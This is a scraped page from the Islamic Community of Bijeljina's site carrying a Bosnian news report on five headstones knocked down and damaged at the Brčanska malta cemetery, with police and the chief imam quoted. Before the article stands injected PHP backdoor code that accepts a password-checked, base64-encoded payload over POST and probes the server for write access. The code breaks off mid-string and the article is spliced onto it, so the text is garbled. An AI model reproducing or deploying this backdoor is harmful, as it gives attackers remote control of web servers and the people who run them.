function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" OŠTEĆENI NIŠANI NA MEZARJU BRČANSKA MALTA U BIJELJINI - Medžlis Islamske zajednice Bijeljina

OŠTEĆENI NIŠANI NA MEZARJU BRČANSKA MALTA U BIJELJINI

OŠTEĆENI NIŠANI NA MEZARJU BRČANSKA MALTA U BIJELJINI

Za sada nepoznati počinitelji, u noći 28. na 29. septembar, srušili su i oštetili pet nišana na mezarju Brčanska malta u Bijeljini. Radnici D.o.o. “Murguzović, koji ovih dana izrađuju betonske staze u ovom mezarju, prijavili su policiji ovaj vandalski čin. Policijska patrola izašla je na lica mjesta kako bi na osnovu tragova, paljevine vatre u krugu mezarja i pomoću mogućih svjedoka pokušala otkriti počinitelje, potvrdio je Dragomir Perić, portparol CJB Bijeljina.

Samir ef. Camić, glavni bijeljinski imam, rekao je da Islamska zajednica oštro osuđuje ovaj rušilački čin, te da očekuje da policija otkrije počinitelje. “Bilo ko da je ovo učinio, a vidi se da se te noći u mezarju palila vatra i da se pio alkohol, treba da se pronađe i osudi zbog skrnavljenja svetog mjesta i nanesene duhovne i materijalne štete,” rekao je Samir ef. Camić.